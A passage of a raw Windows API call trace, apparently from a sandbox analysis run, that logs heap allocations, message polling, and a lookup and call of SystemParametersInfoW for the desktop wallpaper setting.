lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0298.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0298.629] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0298.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0298.630] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0298.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0298.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0298.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0298.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0298.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0298.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0298.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0298.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0298.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0298.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0298.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0298.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0298.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0298.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0298.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0298.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0298.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0298.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0298.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0298.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0298.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0298.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0298.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0298.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0298.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0298.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0298.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0298.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0298.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0298.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0298.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0298.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0298.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0298.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0298.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0298.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0298.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0298.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0298.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0298.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0298.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0298.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0298.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0298.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0298.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0298.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0298.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0298.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0298.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0298.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0298.634] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0298.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0298.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0298.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0298.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0298.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0298.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0298.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0298.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0298.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0298.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0298.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0298.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0298.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0298.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0298.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0298.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0298.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0298.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0298.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0298.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0298.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0298.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0298.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0298.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0298.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0298.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0298.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0298.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0298.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0298.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0298.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0298.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0298.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0298.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0298.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0298.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0298.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0298.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0298.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0298.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0298.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0298.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0298.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0298.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0298.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0298.637] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0298.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0298.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0298.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0298.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0298.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0298.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0298.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0298.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0298.638] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0298.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0298.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0298.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0298.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0298.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0298.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0298.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0298.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0298.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0298.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0298.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0298.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0298.639] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0298.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0298.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0298.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0298.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0298.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0298.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0298.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0298.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0298.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0298.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0298.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0298.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0298.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0298.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0298.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0298.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0298.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0298.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0298.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0298.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0298.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0298.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0298.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0298.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0298.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0298.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0298.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0298.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0298.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0298.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0298.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0298.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0298.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0298.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0298.764] FreeLibrary (hLibModule=0x74f40000) returned 1 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0298.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0298.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0298.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0298.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0298.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0298.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0298.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0298.766] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0298.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0298.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0298.766] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0298.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0298.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0298.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0298.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0298.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0298.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0298.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0298.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0298.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 